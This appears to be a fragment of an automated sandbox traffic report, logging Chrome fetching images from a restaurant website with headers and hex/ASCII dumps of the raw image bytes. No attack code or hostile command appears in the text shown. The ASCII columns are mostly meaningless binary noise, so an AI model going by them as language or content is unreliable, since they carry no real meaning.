                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: c7 89 ed 28 40 cf 58 e2 df 56 ee 6b e9 ee ff 00 f9 2b 46 7f fc 99 d7 cf ff 00 93 b4 04 ff 00 f9 37 44 cf ff 00 93 b4 84 3f fb 43 4e 5d ff 00 b2 f5 6c 54 d9 5d e9 66 a5 ba e6 ad db eb 66 5d 9d 89 f4 cd eb 1a 86 a2 a3 36 ba dd 56 4e 4a 2a 4d ba 2c 5b 09 9b 5a 17 6c 9a 16 9b 76 2d e9 2a b2 ed 3e 97 f5 98 8c 8f b2 0a fa cb 0f 63 7b 45 dc d9 48 9d ab 19 66 fd ec c9 bf b6 e2 f3 66 b9 5e e7 8d 46 f2 65 1a 76 ec ae 97 ce 97 a5 16 5e db 9a c8 0a d2 5a fd 1d af 8a ad b5 22 1b 02 ea e8 73 b9 b0 a1 ad 09 b6 8d 48 57 bd 3e 22 5c b1 fe 0a 21 fe 39 99 f4 e9 8e 28 d7 b3 13 fe 42 84 b3 7f b1 fd ab 1d 11 69 bf 64 b9 f8 ac 59 5e b5 ec 82 8b 70 50 d6 d7 d4 50 8a 70 15 94 04 7a ab 7d 8e d7 5a e0 ad d6 b2 d1 bd 49 89 72 b4 a6 ea ea d7 dd fb 1d 6a db 5d 9e c6 e9 50 04 26 79 95
                                                                                                                                                    Data Ascii: (@XVk+F7D?CN]lT]ff]6VNJ*M,[Zlv-*>c{EHff^Fev^Z"sHW>"\!9(BidY^pPPpz}ZIrj]P&y
                                                                                                                                                    2024-10-01 04:27:01 UTC10368INData Raw: 46 1e 38 fe 49 6b 56 75 76 d6 f1 46 d9 a4 eb d8 2c 50 f9 8d fe 20 1c b4 0a 23 b4 f8 c9 82 a0 27 0e 47 4b a1 4a 81 b3 84 39 66 f8 e0 40 3d 07 a1 fe 0a 4a 9b 18 d8 78 85 8c c5 a7 78 4f ed 5c a4 8a 35 d4 b5 14 9f 93 68 59 58 5e 66 da f6 2d 37 36 ad 76 55 ad 62 d9 28 01 46 72 7c a8 0c d6 44 5c 0b ba ea ec 96 ea 0a 4b 69 89 51 e2 b7 13 64 6d 64 68 75 32 4e a0 49 65 6b 54 b1 aa 56 d8 d8 b3 64 eb d4 ba ab d1 ab 6c 5c bb a3 82 ee d6 c2 ad aa 99 2c ba da cf cc 41 d2 dc b7 5c ea 7d ba f5 9a dd de 96 f8 ee 7b 5a ea 5d 7d cb fa db 75 7f f6 01 9a 7f 67 ea b7 a5 09 54 b0 af 3c 43 1b da e3 f9 03 3e d0 07 ec e8 d6 bc 2b 56 bc 53 d7 b3 3a 54 2b 1a e3 93 f0 10 20 13 12 fd 7f 92 2e b3 eb 9d ab 02 55 ac dc 2a db ac 31 a5 4d 07 63 1f 1d 2d 94 cc 27 02 8b 4e 7e 51 95 75 6f 4b
                                                                                                                                                    Data Ascii: F8IkVuvF,P #'GKJ9f@=JxxO\5hYX^f-76vUb(Fr|D\KiQdmdhu2NIekTVdl\,A\}{Z]}ugT<C>+VS:T+ .U*1Mc-'N~QuoK
                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: f6 63 c7 e7 27 fb 88 7b 78 be b9 0f e2 e9 f8 2d 4a 0e 49 77 67 37 44 3f aa 05 94 77 63 ea f4 9d d0 27 17 42 71 6d 1d d5 9e 87 05 99 db 32 49 6f 07 c9 76 58 b7 87 9a 4b 75 b9 0c fc 09 64 b4 26 a3 22 ec 99 95 e4 37 16 27 a7 90 fe da f6 64 fd 42 4f 9f b6 bd 27 73 77 23 4c 08 ed db 82 17 b9 98 e2 be 51 e5 1e e2 57 2a 91 a1 e8 66 3f 95 8b 15 67 97 51 bf 97 18 b9 3f 19 1e 71 e9 e9 a7 f5 0d 79 10 33 b5 f9 f7 16 fc c8 fc 45 a2 e4 22 e4 b6 76 ab 45 2e 58 83 9d ab d7 8d 70 47 8b bd 24 b2 ee 3e 24 64 76 be 0b 36 59 bb 97 e4 8c 5c 51 31 35 af bc bd 27 a8 b6 24 64 89 10 a9 f0 64 93 48 ab 3f b4 74 42 c3 ae 7c 98 fd ac 6e f2 e8 2c 55 65 70 58 8f 22 fd 79 1b 10 df 4f 4d c8 e9 39 18 8b 62 6b 29 17 25 1c 17 d1 7a 58 e3 44 74 d8 94 22 6b 24 8f ba da a0 8d ee 35 4b 44 32 57
                                                                                                                                                    Data Ascii: c'{x-JIwg7D?wc'Bqm2IovXKud&"7'dBO'sw#LQW*f?gQ?qy3E"vE.XpG$>$dv6Y\Q15'$ddH?tB|n,UepX"yOM9bk)%zXDt"k$5KD2W


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    144192.168.2.449914162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:27:01 UTC660OUTGET /assets/imgs/about-section.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/foodhut.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:27:01 UTC355INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:27:01 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Fri, 29 Sep 2023 22:13:42 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 1627844
                                                                                                                                                    date: Tue, 01 Oct 2024 04:27:01 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:27:01 UTC16029INData Raw: ff d8 ff e1 23 cc 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 17 70 00 00 01 01 00 03 00 00 00 01 0f a0 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 2c 00 00 05 40 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: #ExifMM*p(1"2*i@%,@CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:27:01 UTC8547INData Raw: e2 27 fe 74 97 e3 8c bd d3 fb d1 02 31 fb 38 07 fc c7 b2 fa cd 67 d5 af da 62 dc d0 05 78 75 35 b6 d3 8e c8 2f bd ae 2e af 1d 85 bb 2b 6b aa af 65 76 7f e0 df cc 7a 6b 94 ea 1d 4e fe ad 90 2d c9 22 86 56 d2 cc 6c 3a ff 00 9a a5 9f e0 db f9 bb df fe 12 fb 9f ef 7f fe 04 81 d4 9e 45 9b 9e 4b 99 58 31 bb c4 7b ac 71 fe 53 dd f9 e8 35 6f 89 2d 97 0a c6 e2 47 b8 b9 d0 ef 61 28 72 f1 d2 ce ea e6 2a 3c 30 04 97 ff d3 e2 ba 75 fa 08 fa 75 39 c0 03 ac b1 ed 7d 56 37 fe da b2 d6 21 52 66 1d 51 de d1 2d 6b a3 90 3d bf f5 29 f1 b0 f3 9b 73 6e 0c f4 c0 32 4b cc 18 1f c8 47 73 da f7 83 5b 1a c6 81 b3 70 90 5c ed 6c dd 6f e6 36 cf 76 cf 62 ab 38 d4 8f 50 75 f2 fd e7 47 14 ae 11 bd 0c 7d 3f de fd c6 d6 0e 1f 4f cc 7b 9d 91 50 7d ad 00 82 4b 80 2c 88 1a 31 cd fa 08 99 98
                                                                                                                                                    Data Ascii: 't18gbxu5/.+kevzkN-"Vl:EKX1{qS5o-Ga(r*<0uu9}V7!RfQ-k=)sn2KGs[p\lo6vb8PuG}?O{P}K,1
                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: 04 b6 04 c4 04 d3 04 e1 04 f0 04 fe 05 0d 05 1c 05 2b 05 3a 05 49 05 58 05 67 05 77 05 86 05 96 05 a6 05 b5 05 c5 05 d5 05 e5 05 f6 06 06 06 16 06 27 06 37 06 48 06 59 06 6a 06 7b 06 8c 06 9d 06 af 06 c0 06 d1 06 e3 06 f5 07 07 07 19 07 2b 07 3d 07 4f 07 61 07 74 07 86 07 99 07 ac 07 bf 07 d2 07 e5 07 f8 08 0b 08 1f 08 32 08 46 08 5a 08 6e 08 82 08 96 08 aa 08 be 08 d2 08 e7 08 fb 09 10 09 25 09 3a 09 4f 09 64 09 79 09 8f 09 a4 09 ba 09 cf 09 e5 09 fb 0a 11 0a 27 0a 3d 0a 54 0a 6a 0a 81 0a 98 0a ae 0a c5 0a dc 0a f3 0b 0b 0b 22 0b 39 0b 51 0b 69 0b 80 0b 98 0b b0 0b c8 0b e1 0b f9 0c 12 0c 2a 0c 43 0c 5c 0c 75 0c 8e 0c a7 0c c0 0c d9 0c f3 0d 0d 0d 26 0d 40 0d 5a 0d 74 0d 8e 0d a9 0d c3 0d de 0d f8 0e 13 0e 2e 0e 49 0e 64 0e 7f 0e 9b 0e b6 0e d2 0e ee 0f
                                                                                                                                                    Data Ascii: +:IXgw'7HYj{+=Oat2FZn%:Ody'=Tj"9Qi*C\u&@Zt.Id
                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: 31 32 c3 7d 56 99 ab e1 7c f8 71 27 0a 55 65 b7 af 29 17 8e 8b 5a 8a 40 e0 72 91 1d 3f 1f 4c 6f 71 2d 59 63 a6 b9 9a d5 50 a7 a8 f2 96 aa 4f 2d df 0c 9d bf 2d 2b 9e 23 46 5a 9c b9 de 9c b8 f2 25 6f 19 f6 d6 88 76 0c bd ae c7 65 31 75 e8 3a 9d f1 67 5f 8c ff 00 25 8b 1d b9 ae 47 7e a1 0c ef aa 92 37 d5 5d 57 94 3f 18 a8 1f 55 71 8f 66 5b fc 84 9b 80 dd 31 cf fa 34 78 ba d8 f2 98 6c ac d7 47 72 e0 2c 8b 01 a2 2e 38 fd de 15 9e 24 2b 0a 78 55 d7 11 7f a2 b6 b1 23 97 de ba 44 71 1a 2b cc 67 a6 5a 09 32 00 6a b6 91 eb fa 40 4a 01 f6 0b cf 5e 98 c9 6c 01 ed 09 01 e8 b3 d5 6e 46 fe dd 03 b1 10 d8 90 59 94 ae 35 d5 64 c4 ec 17 58 e3 58 3d bf 27 19 2d 39 d5 95 c0 4a de 20 e1 51 65 dd 66 62 ea a2 9e c5 bc 40 03 45 46 49 5c 46 06 eb 72 31 6a 50 39 49 ce aa d8 69 e7
                                                                                                                                                    Data Ascii: 12}V|q'Ue)Z@r?Loq-YcPO--+#FZ%ove1u:g_%G~7]W?Uqf[14xlGr,.8$+xU#Dq+gZ2j@J^lnFY5dXX='-9J Qefb@EFI\Fr1jP9Ii
                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: 03 96 d0 2b 1c d8 e4 e5 50 f5 0f ea a0 ec 74 8d 70 87 2b 32 b2 eb 15 5b da 80 b0 ca a0 ca 58 d4 74 ba 90 17 87 3b ac ad 72 bb f4 98 cf 8c 14 0f d4 ea f3 b0 19 84 ab ae f7 76 11 34 34 46 c9 a3 91 e2 ab 30 b4 ac d6 b5 bf c9 74 45 d1 e6 35 52 5c 6f d7 5e 7a 50 9d 32 c8 39 5e 89 d3 cb d7 16 33 4a 4e 70 ba 38 a5 67 dc a2 b4 5b 02 7d d1 45 35 9d 89 42 00 3a cf aa fb 31 d8 4c 8f 25 b6 28 d7 31 0c a8 b3 c2 4a de 65 33 17 75 d7 f1 dd 4a a4 d2 98 ca c7 55 d7 9e 5e 8e 9a e1 18 e0 60 ae 5a ec cf d9 8d 55 83 36 d0 2c b6 e2 8f 23 18 4b 5c 15 d3 58 91 d5 a2 fa 6d 8f 07 0e b2 33 dc 29 ae 7c a4 70 14 5d 61 ec 5f 5f f6 15 a9 18 ea b2 f6 3b dc 83 47 18 ca dc 8e 57 a6 43 7f aa db 98 45 a6 a8 92 ac b3 84 45 52 66 ca a8 91 04 a0 7d 02 8a 53 17 43 4f f2 4c 06 27 1b 26 37 ed 4a
                                                                                                                                                    Data Ascii: +Ptp+2[Xt;rv44F0tE5R\o^zP29^3JNp8g[}E5B:1L%(1Je3uJU^`ZU6,#K\Xm3)|p]a__;GWCEERf}SCOL'&7J
                                                                                                                                                    2024-10-01 04:27:01 UTC16336INData Raw: b3 b2 53 91 32 cb a6 16 9b ad d7 95 b3 3e 80 2a 91 6b 88 49 a1 a8 46 da bb 3d 26 80 9c 8b 92 32 a6 b5 ea bf a7 65 74 57 c8 6a a5 56 1b 7b d6 d9 27 04 8f a2 dc 8e 5d 52 d3 d8 79 71 99 70 53 12 53 f7 a9 11 63 5e 46 ab 38 ad 3d 0e ec 61 5b 9f c8 25 8b 2a 8b 6c b7 b7 6f 2d 82 34 ea 53 03 54 01 91 d1 72 be 5d 25 c5 12 ee 73 f6 3a 93 92 f4 e6 f7 0c a1 27 8a eb 1c ad 68 e8 76 00 1e fc a8 d4 37 6a 8a ee 89 94 4b 14 31 86 cb c0 3c 0a b8 cd ae cd 1d 4a e7 43 02 e5 9d 54 73 7e 3f 8e 7c 4f aa 2c 8e a5 7d 41 6c 44 b7 0a 34 cf de 8c 23 ed 96 18 29 1a 71 6d 90 94 88 0b a3 cf 46 12 11 8e 50 56 66 39 3a 26 ba 46 89 0a c4 99 81 52 d7 59 1a fc 75 80 06 27 2b 2d b4 f6 e7 5b 33 b2 88 e7 4a d8 4a 2d 1c a6 26 8d 7d ea e9 0c 03 95 71 9d 63 ed 5c 2e f7 2b 22 56 26 6c ad b3 82 ee
                                                                                                                                                    Data Ascii: S2>*kIF=&2etWjV{']RyqpSSc^F8=a[%*lo-4STr]%s:'hv7jK1<JCTs~?|O,}AlD4#)qmFPVf9:&FRYu'+-[3JJ-&}qc\.+"V&l
                                                                                                                                                    2024-10-01 04:27:01 UTC48INData Raw: f1 8a 0b ea a2 11 f7 58 43 9d 94 69 9f b9 c4 9e 31 46 6d 64 ae 72 ae 4f 1c 15 71 cf 71 d5 e8 ce c9 c8 4e 67 01 65 db 75 ab bd dc ac c4 c4 28 8e
                                                                                                                                                    Data Ascii: XCi1FmdrOqqNgeu(
                                                                                                                                                    2024-10-01 04:27:02 UTC16384INData Raw: 5d 5d 88 bf 10 b4 9a aa f2 01 70 14 55 bd 0b e7 5c 89 8a 2c 59 d9 ef 5d 23 ab 7d 15 89 58 ee e5 64 9c ad c6 29 a9 a8 c8 b0 4a 91 a0 75 ca c6 ba 4e 56 4a 81 4c 4f 2d 53 57 09 75 c4 d7 84 46 31 32 ea a3 44 81 8c 1f 74 1a ba 9d 11 7d 66 72 d5 66 f5 8e bc f2 b2 be 8c e1 30 da 05 9b d3 a7 a9 fb f3 95 70 e2 56 65 5e bf 1c ce ac 5e c7 97 aa ea f3 2c f2 14 98 e8 90 ac 9c 30 ea b2 58 c8 bf b5 11 a6 14 93 f9 29 aa e8 57 28 d1 53 c5 65 a8 cf 5f 6e 52 91 90 38 5a c4 b5 2f ba 5d 8f 61 49 13 58 a4 f0 2c aa 10 97 45 4a a2 e5 51 7d bd 79 08 b8 1a a6 98 ce 62 62 3d c8 c9 78 99 68 89 88 f2 81 51 63 55 9d 81 2a 84 40 c8 55 b6 49 12 88 ec f8 9b 62 2b 20 6a b9 d8 f4 73 4f 7c 24 60 4c 82 91 d3 a9 e1 c7 95 92 84 98 2e 8f 15 a4 04 92 ea 9a 04 ea 82 ca 9f 7d 10 3c a0 d8 1b a2 af
                                                                                                                                                    Data Ascii: ]]pU\,Y]#}Xd)JuNVJLO-SWuF12Dt}frf0pVe^^,0X)W(Se_nR8Z/]aIX,EJQ}ybb=xhQcU*@UIb+ jsO|$`L.}<
                                                                                                                                                    2024-10-01 04:27:02 UTC16384INData Raw: 08 19 00 3a b2 08 74 40 9f 54 07 e8 80 8c 16 28 00 0f 94 04 fa a0 00 a0 0e 81 90 4c 7e 88 09 fa 20 85 14 ac 82 33 22 23 36 50 4d 70 82 69 94 05 dd 04 c8 40 50 00 76 41 0b 6c 82 02 80 3a 08 42 02 db a0 3c 86 a8 21 7d 50 04 10 e4 20 0e 80 ea 82 20 0f b2 08 18 20 87 e8 82 63 64 13 08 09 3b 20 20 3a 02 e0 20 03 3a 20 12 1e 9a a8 20 28 08 f5 28 16 47 74 06 25 14 5c 20 0c 80 33 20 5d 50 16 f5 40 a0 32 02 32 80 33 20 0f ea 8a 83 28 21 0c 3e a8 24 42 00 ea 00 82 0c 20 80 20 25 90 30 2c 11 50 a0 68 a0 b0 63 08 1b 01 55 42 3d 10 17 6f d5 01 21 f4 40 08 6d 10 0e 2d 94 51 01 c2 21 8b 20 04 04 01 90 40 02 21 79 10 50 55 36 ca 0a d0 29 44 41 e8 82 14 13 5c a8 21 41 06 3e e8 26 c8 26 88 89 f5 41 02 08 82 04 11 01 77 54 44 04 63 28 0a 00 ee 50 47 01 04 70 80 14 11 01 1b
                                                                                                                                                    Data Ascii: :t@T(L~ 3"#6PMpi@PvAl:B<!}P cd; : : ((Gt%\ 3 ]P@223 (!>$B %0,PhcUB=o!@m-Q! @!yPU6)DA\!A>&&AwTDc(PGp
                                                                                                                                                    2024-10-01 04:27:02 UTC8192INData Raw: 32 da f8 92 bb eb 95 8a 43 00 5d 44 5d 45 9c 24 08 57 12 b4 ca 26 c8 72 91 75 9b 4c 68 eb f8 ce 7f 98 59 bd b5 39 75 68 f1 d5 56 74 d1 72 bd 3b 4e 5b 23 54 23 a0 fa 2c ea e3 cf 79 78 c6 53 2d 80 bd 1c 5d 71 ee 63 92 22 04 97 47 37 6b c3 52 2c 93 cb 2c b1 5b e5 d9 ed c2 31 ac ba cc ae 96 3c c7 21 f2 3b 61 d6 dc 9f ff d5 f1 30 26 01 96 75 93 0b 0b e7 45 b9 51 74 66 76 5a d4 68 a8 f2 c1 54 5e 61 84 d0 ff 00 b3 ac 87 32 01 54 63 31 1c b8 8d 11 42 78 08 29 33 2c 5d 51 21 9d b0 a0 73 1c fd 10 4e 01 b2 8a af 94 63 2c a0 12 69 94 04 56 c1 c2 8a 84 06 ca 0c 17 58 41 20 20 48 46 52 d5 45 8a 7b 10 31 ca cb 4c 53 1b 28 a4 d0 28 17 44 0c 06 19 00 01 90 10 73 84 0f 02 e5 4a 37 52 41 0c b0 34 1f 45 00 31 d9 00 8c 4b a0 d3 1a 5c 3a 07 1d 49 11 f4 40 f4 f5 08 cb 28 86 9d
                                                                                                                                                    Data Ascii: 2C]D]E$W&ruLhY9uhVtr;N[#T#,yxS-]qc"G7kR,,[1<!;a0&uEQtfvZhT^a2Tc1Bx)3,]Q!sNc,iVXA HFRE{1LS((DsJ7RA4E1K\:I@(


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    145192.168.2.449913162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:27:01 UTC667OUTGET /assets/imgs/Banner_location_image.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:27:01 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:27:01 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Thu, 05 Oct 2023 21:35:48 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 731743
                                                                                                                                                    date: Tue, 01 Oct 2024 04:27:01 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:27:01 UTC16031INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 14 00 00 02 07 08 06 00 00 00 ee 03 d0 53 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRSpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: 6b 80 99 f5 a6 c6 68 1c ee 83 64 98 1d dc 0b ef 01 97 fb f9 70 14 af 6b 44 c2 a6 83 67 1d 98 6e 57 80 79 c7 fe 8f 3d 18 6d aa 07 de 24 ee a2 e4 5e e3 0a 03 49 24 48 4c 81 94 26 22 b5 8d ae 6e d4 c4 9a e3 be a1 10 f3 73 39 49 06 19 a8 de 00 ed be 56 e7 c4 8a 11 c7 2a 55 37 4e ea f5 b9 4c 46 89 c1 39 51 9a b2 f1 e4 20 e1 fc 72 f2 f3 ed 34 23 c3 25 dc e7 07 85 71 9a 08 94 74 2d ba 39 f7 52 02 89 a1 48 d9 af 15 4d a2 58 15 06 4a 04 62 25 ce a0 5a 81 e0 df 53 8b 5e 0c 4e 34 27 62 76 39 1c 23 f3 fd 85 6b a8 c6 1e 37 4a 8f b5 1a fd 51 0f 32 86 bf 34 a0 06 2d 5e 45 e3 00 a3 d2 ba ae 58 d7 d5 03 a2 8d 54 d1 74 14 7b e0 b8 97 41 aa 65 d1 00 cc d4 0e 73 34 1b b0 88 a1 34 be 25 44 45 ef 26 13 0e cc 59 6a 09 3e 01 30 86 5a 36 43 02 90 4c 91 0c 48 ae a1 48 0c b2 54 7d
                                                                                                                                                    Data Ascii: khdpkDgnWy=m$^I$HL&"ns9IV*U7NLF9Q r4#%qt-9RHMXJb%ZS^N4'bv9#k7JQ24-^EXTt{Aes44%DE&Yj>0Z6CLHHT}
                                                                                                                                                    2024-10-01 04:27:01 UTC15252INData Raw: 27 43 06 21 07 d3 e3 bc ae 80 65 14 13 d7 fe 0a 77 47 d3 04 33 45 ce 8c 29 25 9b 26 a6 d3 3c e3 75 62 9c 92 6b 6e 26 33 fc 2e 9d 40 45 f1 6f ff f6 6f 38 7f fe 42 af af af 60 65 5c fe f8 67 7c 79 5b 47 d6 07 80 a9 51 10 fc bc f4 63 1a 9d 9b 41 d0 e2 d7 bf 98 01 d3 84 d3 e9 84 97 69 06 33 41 8b 40 45 37 53 8b 53 06 53 46 9e 27 9c 4e 13 4e af 1f f0 f2 f2 82 d3 6b 30 66 a7 93 8f db d0 7e b1 a9 00 79 02 4d 33 a6 52 60 7a c1 d7 af 5f 5b 09 34 91 91 6f 74 7d 63 56 4d 5d fa c0 b7 cf a6 27 e4 ab e0 90 ba 2b 3e 00 4f ea 1a 7c d6 69 cd 64 f3 b2 2d 0d e7 ed 52 1c 54 53 73 c7 d2 a6 45 c5 75 5c 49 2d 69 76 4d 29 49 ed ba 12 05 ef 87 c8 9d 4e 01 a4 8f 13 d6 45 f0 19 6f ce e2 4c 0c f6 73 32 00 b4 9c 2f a3 09 04 8a 1b b2 00 6e 8c 53 c7 75 dc 0f aa 01 3a a9 03 26 45 25 74
                                                                                                                                                    Data Ascii: 'C!ewG3E)%&<ubkn&3.@Eoo8B`e\g|y[GQcAi3A@E7SSSF'NNk0f~yM3R`z_[4ot}cVM]'+>O|id-RTSsEu\I-ivM)INEoLs2/nSu:&E%t
                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: a8 bb d4 97 22 58 d7 d2 8c bd fa 04 51 ff 7d cc 3c ac 21 f5 18 d6 d5 4d c1 d6 2f 6f 90 b7 0b f4 b2 62 7d 3b e3 eb e7 2f 74 fe fa 06 59 0b 12 31 4c d6 4e 63 84 20 4c 71 cd 7d 5c bd ec c0 ce 7d 89 f7 bb 1b 00 23 64 b8 1c 02 55 3d 45 75 26 79 6f 1c 25 e1 64 2f 50 14 75 e6 ba 68 82 52 86 80 51 68 45 11 83 5f 6e 02 68 02 25 60 9e 52 03 22 dd 84 4b 01 ae fd e4 ac 77 bf 7f 3c a9 06 84 c1 55 53 08 f3 f1 57 a4 58 59 8d 4a b8 6a d7 18 df b8 2b dd 85 97 fb 1a f1 60 80 16 1a 6e 9e 00 0b a9 0a ad f7 a9 6e e3 25 a5 54 2b 0a ac ae 2f 3d c3 b5 6a 0e 0e ba 66 d8 ca fd c9 5c 87 b6 8d f5 7a 3d 14 87 f7 d6 2d 10 ba ff 59 13 96 b7 5a 73 c6 1e 3e 9b 06 03 9c 1e 0c ee fb 85 88 c0 99 87 fb c1 35 82 43 ff f7 46 6e 79 90 3c 31 ab e4 63 54 06 b5 6e 97 ae 49 ac c0 fd d3 b6 4a 98 0d
                                                                                                                                                    Data Ascii: "XQ}<!M/ob};/tY1LNc Lq}\}#dU=Eu&yo%d/PuhRQhE_nh%`R"Kw<USWXYJj+`nn%T+/=jf\z=-YZs>5CFny<1cTnIJ
